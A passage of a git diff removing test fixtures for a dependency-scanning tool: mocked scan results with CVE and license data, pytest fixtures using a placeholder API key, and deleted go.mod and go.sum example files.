NOTE: this may overlap CVE-2018-1000656.", - "severity": "high", - "packageName": "flask", - "packageVersion": "0.6", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010083", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "DoS", - "Has fix", - "High severity", - ], - "impactedVersions": ["<1.0"], - "publishedDate": "2019-07-17T16:15:00+02:00", - "discoveredDate": "2019-07-17T14:15:00Z", - "fixDate": "2019-07-17T16:15:00+02:00", - }, - { - "id": "CVE-2018-1000656", - "status": "fixed in 0.12.3", - "cvss": 7.5, - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "The Pallets Project flask version Before 0.12.3 contains a CWE-20: Improper Input Validation vulnerability in flask that can result in Large amount of memory usage possibly leading to denial of service. This attack appear to be exploitable via Attacker provides JSON data in incorrect encoding. This vulnerability appears to have been fixed in 0.12.3. NOTE: this may overlap CVE-2019-1010083.", - "severity": "high", - "packageName": "flask", - "packageVersion": "0.6", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000656", - "riskFactors": [ - "Attack complexity: low", - "Attack vector: network", - "DoS", - "Has fix", - "High severity", - ], - "impactedVersions": ["<0.12.3"], - "publishedDate": "2018-08-20T21:31:00+02:00", - "discoveredDate": "2018-08-20T19:31:00Z", - "fixDate": "2018-08-20T21:31:00+02:00", - }, - ], - "vulnerabilityDistribution": {"critical": 1, "high": 3, "medium": 2, "low": 0, "total": 6}, - "license_statuses": [ - { - "packageName": "django", - "packageVersion": "1.2", - "packageLang": "python", - "license": "OSI_BDS", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - }, - { - "packageName": "flask", - "packageVersion": "0.6", - "packageLang": "python", - "license": "OSI_APACHE", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - }, - { - "packageName": "flask", - "packageVersion": "0.6", - "packageLang": "python", - 
"license": 'DUMMY_OTHER_LICENSE, ANOTHER_DOMMY_LICENSE', # for testing a comma inside licenses - "status": "OPEN", - "policy": "BC_LIC_1" - }, - { - "packageName": "requests", - "packageVersion": "2.26.0", - "packageLang": "python", - "license": "OSI_APACHE", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - } - ], - }, - { - "repository": "/path/to/sub/requirements.txt", - "passed": True, - "packages": [ - { - "type": "python", - "name": "requests", - "version": "2.26.0", - "path": "/path/to/sub/requirements.txt", - } - ], - "complianceIssues": None, - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "vulnerabilities": None, - "vulnerabilityDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "license_statuses": [ - { - "packageName": "requests", - "packageVersion": "2.26.0", - "packageLang": "python", - "license": "OSI_APACHE", - "status": "COMPLIANT", - "policy": "BC_LIC_1" - } - ], - }, - { - "repository": "/path/to/go.sum", - "passed": True, - "packages": [ - { - "type": "go", - "name": "github.com/miekg/dns", - "version": "v1.1.41", - "path": "/path/to/go.sum", - }, - { - "type": "go", - "name": "golang.org/x/crypto", - "version": "v0.0.1", - "path": "/path/to/go.sum", - }, - { - "type": "go", - "name": "github.com/dgrijalva/jwt-go", - "version": "v3.2.0", - "path": "/path/to/go.sum", - }, - { - "type": "go", - "name": "github.com/prometheus/client_model", - "version": "v0.0.0-20190129233127-fd36f4220a90", - "path": "/path/to/go.sum", - } - ], - "complianceIssues": None, - "complianceDistribution": {"critical": 0, "high": 0, "medium": 0, "low": 0, "total": 0}, - "vulnerabilities": [ - { - "id": "CVE-2020-29652", - "status": "fixed in v0.0.2", - "cvss": 7.5, - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "description": "A nil pointer dereference in the golang.org/x/crypto/ssh component through v0.0.3 for Go allows remote attackers to cause a denial of service against SSH 
servers.", - "severity": "high", - "packageName": "golang.org/x/crypto", - "packageVersion": "v0.0.1", - "link": "https://nvd.nist.gov/vuln/detail/CVE-2020-29652", - "riskFactors": [ - "Has fix", - "High severity", - "Attack complexity: low", - "Attack vector: network", - "DoS", - ], - "impactedVersions": [" Dict[str, Any]: - return {'outputType': 'Result', - 'outputData': "H4sIAN22X2IC/8WY23LbOBKGX6VLN5tUWRQp" - "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", - 'compressionMethod': 'gzip'} - - -@pytest.fixture(scope='package') -@mock.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'false'}) -def sca_package_report(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report: - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = scan_result - package_mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - - return Runner().run(root_folder=EXAMPLES_DIR) - -@pytest.fixture(scope='package') -def sca_package_report_with_comma_in_licenses(package_mocker: MockerFixture, scan_result_with_comma_in_licenses: List[Dict[str, Any]]) -> Report: - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = scan_result_with_comma_in_licenses - 
package_mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - - package_mocker.patch.dict(os.environ, {'CHECKOV_RUN_SCA_PACKAGE_SCAN_V2': 'false'}) - return Runner().run(root_folder=EXAMPLES_DIR) - - -def get_sca_package_report_with_skip(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report: - bc_integration.bc_api_key = "abcd1234-abcd-1234-abcd-1234abcd1234" - scanner_mock = MagicMock() - scanner_mock.return_value.scan.return_value = scan_result - package_mocker.patch("checkov.sca_package.runner.Scanner", side_effect=scanner_mock) - runner_filter = RunnerFilter(skip_checks=["CKV_CVE_2020_29652"]) - - return Runner().run(root_folder=EXAMPLES_DIR, runner_filter=runner_filter) - - -@pytest.fixture(scope='package') -def sca_package_report_with_skip(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report: - return get_sca_package_report_with_skip(package_mocker, scan_result) - - -@pytest.fixture(scope='function') -def sca_package_report_with_skip_scope_function(package_mocker: MockerFixture, scan_result: List[Dict[str, Any]]) -> Report: - return get_sca_package_report_with_skip(package_mocker, scan_result) diff --git a/tests/sca_package/examples/go.mod b/tests/sca_package/examples/go.mod deleted file mode 100644 index d6749d1c251..00000000000 --- a/tests/sca_package/examples/go.mod +++ /dev/null 
@@ -1,60 +0,0 @@
-module github.com/gruebel/checkov
-
-require (
- github.com/abbot/go-http-auth v0.4.0
- github.com/aryszka/jobqueue v0.0.2
- github.com/cenkalti/backoff v2.2.1+incompatible
- github.com/cjoudrey/gluahttp v0.0.0-20190104103309-101c19a37344
- github.com/cjoudrey/gluaurl v0.0.0-20161028222611-31cbb9bef199
- github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd // indirect
- github.com/coreos/go-oidc v2.0.0+incompatible
- github.com/dgrijalva/jwt-go v3.2.0+incompatible
- github.com/dimfeld/httppath v0.0.0-20170720192232-ee938bf73598
- github.com/felixge/httpsnoop v1.0.0 // indirect
- github.com/ghodss/yaml v1.0.0
- github.com/go-redis/redis/v8 v8.3.3
- github.com/google/go-cmp v0.5.2
- github.com/hashicorp/memberlist v0.1.4
- github.com/instana/go-sensor v1.4.16
- github.com/lightstep/lightstep-tracer-go v0.24.1-0.20210318180546-a67254760a58
- github.com/looplab/fsm v0.1.0 // indirect
- github.com/miekg/dns v1.1.41 // indirect
- github.com/oklog/ulid v1.3.1
- github.com/opentracing/basictracer-go v1.0.0
- github.com/opentracing/opentracing-go v1.1.0
- github.com/pkg/errors v0.8.1
- github.com/pquerna/cachecontrol v0.0.0-20180517163645-1555304b9b35 // indirect
- github.com/prometheus/client_golang v1.0.0
- github.com/rcrowley/go-metrics v0.0.0-20181016184325-3113b8401b8a
- github.com/sanity-io/litter v1.1.0
- github.com/sarslanhan/cronmask v0.0.0-20190709075623-766eca24d011
- github.com/shirou/gopsutil v3.21.2+incompatible // indirect
- github.com/sirupsen/logrus v1.4.2
- github.com/sony/gobreaker v0.4.1
- github.com/stretchr/testify v1.6.1
- github.com/szuecs/rate-limit-buffer v0.7.1
- github.com/szuecs/routegroup-client v0.17.7
- github.com/tidwall/gjson v1.7.4
- github.com/tklauser/go-sysconf v0.3.5 // indirect
- github.com/uber-go/atomic v1.4.0 // indirect
- github.com/uber/jaeger-client-go v2.16.0+incompatible
- github.com/uber/jaeger-lib v2.0.0+incompatible
- github.com/yookoala/gofast v0.6.0
- github.com/yuin/gopher-lua v0.0.0-20200603152657-dc2b0ca8b37e
- go.uber.org/atomic v1.4.0 // indirect
- golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9
- golang.org/x/net v0.0.0-20210415231046-e915ea6b2b7d
- golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45
- golang.org/x/sync v0.0.0-20210220032951-036812b2e83c
- golang.org/x/sys v0.0.0-20210415045647-66c3f260301c // indirect
- golang.org/x/tools v0.1.0 // indirect
- google.golang.org/grpc v1.22.0 // indirect
- gopkg.in/alecthomas/kingpin.v2 v2.2.6
- gopkg.in/square/go-jose.v2 v2.3.1
- gopkg.in/yaml.v2 v2.4.0
- k8s.io/api v0.18.6
- k8s.io/apimachinery v0.18.6
- layeh.com/gopher-json v0.0.0-20190114024228-97fed8db8427
-)
-
-go 1.13
diff --git a/tests/sca_package/examples/go.sum
deleted file mode 100644
index 82a4209448b..00000000000
--- a/tests/sca_package/examples/go.sum
+++ /dev/null
@@ -1,511 +0,0 @@ -cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= -cloud.google.com/go v0.34.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= -cloud.google.com/go v0.38.0 h1:ROfEUZz+Gh5pa62DJWXSaonyu3StP6EA6lPEXPI6mCo= -cloud.google.com/go v0.38.0/go.mod h1:990N+gfupTy94rShfmMCWGDn0LpTmnzTp2qbd1dvSRU= -github.com/Azure/go-autorest/autorest v0.9.0/go.mod h1:xyHB1BMZT0cuDHU7I0+g046+BFDTQ8rEZB0s4Yfa6bI= -github.com/Azure/go-autorest/autorest/adal v0.5.0/go.mod h1:8Z9fGy2MpX0PvDjB1pEgQTmVqjGhiHBW7RJJEciWzS0= -github.com/Azure/go-autorest/autorest/date v0.1.0/go.mod h1:plvfp3oPSKwf2DNjlBjWF/7vwR+cUD/ELuzDCXwHUVA= -github.com/Azure/go-autorest/autorest/mocks v0.1.0/go.mod h1:OTyCOPRA2IgIlWxVYxBee2F5Gr4kF2zd2J5cFRaIDN0= -github.com/Azure/go-autorest/autorest/mocks v0.2.0/go.mod h1:OTyCOPRA2IgIlWxVYxBee2F5Gr4kF2zd2J5cFRaIDN0= -github.com/Azure/go-autorest/logger v0.1.0/go.mod h1:oExouG+K6PryycPJfVSxi/koC6LSNgds39diKLz7Vrc= -github.com/Azure/go-autorest/tracing v0.5.0/go.mod h1:r/s2XiOKccPW3HrqB+W0TQzfbtp2fGCgRFtBroKn4Dk= -github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= -github.com/BurntSushi/xgb v0.0.0-20160522181843-27f122750802/go.mod h1:IVnqGOEym/WlBOVXweHU+Q+/VP0lqqI8lqeDx9IjBqo= -github.com/NYTimes/gziphandler v0.0.0-20170623195520-56545f4a5d46/go.mod h1:3wb06e3pkSAbeQ52E9H9iFoQsEEwGN64994WTCIhntQ= -github.com/PuerkitoBio/purell v1.0.0/go.mod h1:c11w/QuzBsJSee3cPx9rAFu61PvFxuPbtSwDGJws/X0= -github.com/PuerkitoBio/purell v1.1.1/go.mod h1:c11w/QuzBsJSee3cPx9rAFu61PvFxuPbtSwDGJws/X0= -github.com/PuerkitoBio/urlesc v0.0.0-20160726150825-5bd2802263f2/go.mod h1:uGdkoq3SwY9Y+13GIhn11/XLaGBb4BfwItxLd5jeuXE= -github.com/PuerkitoBio/urlesc v0.0.0-20170810143723-de5bf2ad4578/go.mod h1:uGdkoq3SwY9Y+13GIhn11/XLaGBb4BfwItxLd5jeuXE= -github.com/StackExchange/wmi v0.0.0-20190523213315-cbe66965904d h1:G0m3OIz70MZUWq3EgK3CesDbo8upS2Vm9/P3FtgI+Jk= -github.com/StackExchange/wmi 
v0.0.0-20190523213315-cbe66965904d/go.mod h1:3eOhrUMpNV+6aFIbp5/iudMxNCF27Vw2OZgy4xEx0Fg= -github.com/abbot/go-http-auth v0.4.0 h1:QjmvZ5gSC7jm3Zg54DqWE/T5m1t2AfDu6QlXJT0EVT0= -github.com/abbot/go-http-auth v0.4.0/go.mod h1:Cz6ARTIzApMJDzh5bRMSUou6UMSp0IEXg9km/ci7TJM= -github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc h1:cAKDfWh5VpdgMhJosfJnn5/FoN2SRZ4p7fJNX58YPaU= -github.com/alecthomas/template v0.0.0-20160405071501-a0175ee3bccc/go.mod h1:LOuyumcjzFXgccqObfd/Ljyb9UuFJ6TxHnclSeseNhc= -github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf h1:qet1QNfXsQxTZqLG4oE62mJzwPIB8+Tee4RNCL9ulrY= -github.com/alecthomas/units v0.0.0-20151022065526-2efee857e7cf/go.mod h1:ybxpYRFXyAe+OPACYpWeL0wqObRcbAqCMya13uyzqw0= -github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da h1:8GUt8eRujhVEGZFFEjBj46YV4rDjvGrNxb0KMWYkL2I= -github.com/armon/go-metrics v0.0.0-20180917152333-f0300d1749da/go.mod h1:Q73ZrmVTwzkszR9V5SSuryQ31EELlFMUz1kKyl939pY= -github.com/aryszka/jobqueue v0.0.2 h1:LYPhzklo0XFpVF+QtzfP9XRQPEsbJ2EW5Pur6pxxaS4= -github.com/aryszka/jobqueue v0.0.2/go.mod h1:SdxqI6HZ4E1Lss94tey5OfjcAu3bdCDWS1AQzzIN4m4= -github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q= -github.com/beorn7/perks v1.0.0 h1:HWo1m869IqiPhD389kmkxeTalrjNbbJTC8LXupb+sl0= -github.com/beorn7/perks v1.0.0/go.mod h1:KWe93zE9D1o94FZ5RNwFwVgaQK1VOXiVxmqh+CedLV8= -github.com/cenkalti/backoff v2.2.1+incompatible h1:tNowT99t7UNflLxfYYSlKYsBpXdEet03Pg2g16Swow4= -github.com/cenkalti/backoff v2.2.1+incompatible/go.mod h1:90ReRw6GdpyfrHakVjL/QHaoyV4aDUVVkXQJJJ3NXXM= -github.com/cespare/xxhash/v2 v2.1.1 h1:6MnRN8NT7+YBpUIWxHtefFZOKTAPgGjpQSxqLNn0+qY= -github.com/cespare/xxhash/v2 v2.1.1/go.mod h1:VGX0DQ3Q6kWi7AoAeZDth3/j3BFtOZR5XLFGgcrjCOs= -github.com/chzyer/logex v1.1.10/go.mod h1:+Ywpsq7O8HXn0nuIou7OrIPyXbp3wmkHB+jjWRnGsAI= -github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e/go.mod 
h1:nSuG5e5PlCu98SY8svDHJxuZscDgtXS6KTTbou5AhLI= -github.com/chzyer/test v0.0.0-20180213035817-a1ea475d72b1/go.mod h1:Q3SI9o4m/ZMnBNeIyt5eFwwo7qiLfzFZmjNmxjkiQlU= -github.com/cjoudrey/gluahttp v0.0.0-20190104103309-101c19a37344 h1:nTK6O2RY1nHC4jNEJd1nixVP7ygY3QE4CNxCX07dHKU= -github.com/cjoudrey/gluahttp v0.0.0-20190104103309-101c19a37344/go.mod h1:X97UjDTXp+7bayQSFZk2hPvCTmTZIicUjZQRtkwgAKY= -github.com/cjoudrey/gluaurl v0.0.0-20161028222611-31cbb9bef199 h1:cJ1E8ZwZLfercTX3dywnCAQDilbbi+m2cw3+8tCFpRo= -github.com/cjoudrey/gluaurl v0.0.0-20161028222611-31cbb9bef199/go.mod h1:jC+zrjHA5CaxJzn+tojIoIOzSp/6BlkRWXnMlxNkB+g= -github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw= -github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd h1:qMd81Ts1T2OTKmB4acZcyKaMtRnY5Y44NuXGX2GFJ1w= -github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd/go.mod h1:sE/e/2PUdi/liOCUjSTXgM1o87ZssimdTWN964YiIeI= -github.com/coreos/go-oidc v2.0.0+incompatible h1:+RStIopZ8wooMx+Vs5Bt8zMXxV1ABl5LbakNExNmZIg= -github.com/coreos/go-oidc v2.0.0+incompatible/go.mod h1:CgnwVTmzoESiwO9qyAFEMiHoZ1nMCKZlZ9V6mm3/LKc= -github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= -github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= -github.com/dgrijalva/jwt-go v3.2.0+incompatible h1:7qlOGliEKZXTDg6OTjfoBKDXWrumCAMpl/TFQ4/5kLM= -github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ= -github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f h1:lO4WD4F/rVNCu3HqELle0jiPLLBs70cWOduZpkS1E78= -github.com/dgryski/go-rendezvous v0.0.0-20200823014737-9f7001d12a5f/go.mod h1:cuUVRXasLTGF7a8hSLbxyZXjz+1KgoB3wDUb6vlszIc= -github.com/dimfeld/httppath v0.0.0-20170720192232-ee938bf73598 h1:MGKhKyiYrvMDZsmLR/+RGffQSXwEkXgfLSA08qDn9AI= 
-github.com/dimfeld/httppath v0.0.0-20170720192232-ee938bf73598/go.mod h1:0FpDmbrt36utu8jEmeU05dPC9AB5tsLYVVi+ZHfyuwI= -github.com/docker/spdystream v0.0.0-20160310174837-449fdfce4d96/go.mod h1:Qh8CwZgvJUkLughtfhJv5dyTYa91l1fOUCrgjqmcifM= -github.com/elazarl/goproxy v0.0.0-20170405201442-c4fc26588b6e/go.mod h1:/Zj4wYkgs4iZTTu3o/KG3Itv/qCCa8VVMlb3i9OVuzc= -github.com/elazarl/goproxy v0.0.0-20180725130230-947c36da3153/go.mod h1:/Zj4wYkgs4iZTTu3o/KG3Itv/qCCa8VVMlb3i9OVuzc= -github.com/emicklei/go-restful v0.0.0-20170410110728-ff4f55a20633/go.mod h1:otzb+WCGbkyDHkqmQmT5YD2WR4BBwUdeQoFo8l/7tVs= -github.com/emicklei/go-restful v2.9.5+incompatible/go.mod h1:otzb+WCGbkyDHkqmQmT5YD2WR4BBwUdeQoFo8l/7tVs= -github.com/evanphx/json-patch v4.2.0+incompatible/go.mod h1:50XU6AFN0ol/bzJsmQLiYLvXMP4fmwYFNcr97nuDLSk= -github.com/felixge/httpsnoop v1.0.0 h1:gh8fMGz0rlOv/1WmRZm7OgncIOTsAj21iNJot48omJQ= -github.com/felixge/httpsnoop v1.0.0/go.mod h1:3+D9sFq0ahK/JeJPhCBUV1xlf4/eIYrUQaxulT0VzX8= -github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo= -github.com/fsnotify/fsnotify v1.4.9 h1:hsms1Qyu0jgnwNXIxa+/V/PDsU6CfLf6CNO8H7IWoS4= -github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ= -github.com/ghodss/yaml v0.0.0-20150909031657-73d445a93680/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= -github.com/ghodss/yaml v1.0.0 h1:wQHKEahhL6wmXdzwWG11gIVCkOv05bNOh+Rxn0yngAk= -github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04= -github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as= -github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE= -github.com/go-logr/logr v0.1.0/go.mod h1:ixOQHD9gLJUVQQ2ZOR7zLEifBX6tGkNJF4QyIY7sIas= -github.com/go-ole/go-ole v1.2.4 h1:nNBDSCOigTSiarFpYE9J/KtEA1IOW4CNeqT9TQDqCxI= -github.com/go-ole/go-ole v1.2.4/go.mod h1:XCwSNxSkXRo4vlyPy93sltvi/qJq0jqQhjqQNIwKuxM= 
-github.com/go-openapi/jsonpointer v0.0.0-20160704185906-46af16f9f7b1/go.mod h1:+35s3my2LFTysnkMfxsJBAMHj/DoqoB9knIWoYG/Vk0= -github.com/go-openapi/jsonpointer v0.19.2/go.mod h1:3akKfEdA7DF1sugOqz1dVQHBcuDBPKZGEoHC/NkiQRg= -github.com/go-openapi/jsonpointer v0.19.3/go.mod h1:Pl9vOtqEWErmShwVjC8pYs9cog34VGT37dQOVbmoatg= -github.com/go-openapi/jsonreference v0.0.0-20160704190145-13c6e3589ad9/go.mod h1:W3Z9FmVs9qj+KR4zFKmDPGiLdk1D9Rlm7cyMvf57TTg= -github.com/go-openapi/jsonreference v0.19.2/go.mod h1:jMjeRr2HHw6nAVajTXJ4eiUwohSTlpa0o73RUL1owJc= -github.com/go-openapi/jsonreference v0.19.3/go.mod h1:rjx6GuL8TTa9VaixXglHmQmIL98+wF9xc8zWvFonSJ8= -github.com/go-openapi/spec v0.0.0-20160808142527-6aced65f8501/go.mod h1:J8+jY1nAiCcj+friV/PDoE1/3eeccG9LYBs0tYvLOWc= -github.com/go-openapi/spec v0.19.3/go.mod h1:FpwSN1ksY1eteniUU7X0N/BgJ7a4WvBFVA8Lj9mJglo= -github.com/go-openapi/swag v0.0.0-20160704191624-1d0bd113de87/go.mod h1:DXUve3Dpr1UfpPtxFw+EFuQ41HhCWZfha5jSVRG7C7I= -github.com/go-openapi/swag v0.19.2/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk= -github.com/go-openapi/swag v0.19.5/go.mod h1:POnQmlKehdgb5mhVOsnJFsivZCEZ/vjK9gh66Z9tfKk= -github.com/go-redis/redis/v8 v8.3.3 h1:e0CL9fsFDK92pkIJH2XAeS/NwO2VuIOAoJvI6yktZFk= -github.com/go-redis/redis/v8 v8.3.3/go.mod h1:jszGxBCez8QA1HWSmQxJO9Y82kNibbUmeYhKWrBejTU= -github.com/go-restit/lzjson v0.0.0-20161206095556-efe3c53acc68/go.mod h1:7vXSKQt83WmbPeyVjCfNT9YDJ5BUFmcwFsEjI9SCvYM= -github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY= -github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ= -github.com/gogo/protobuf v1.2.2-0.20190723190241-65acae22fc9d/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= -github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= -github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q= -github.com/gogo/protobuf v1.3.2/go.mod 
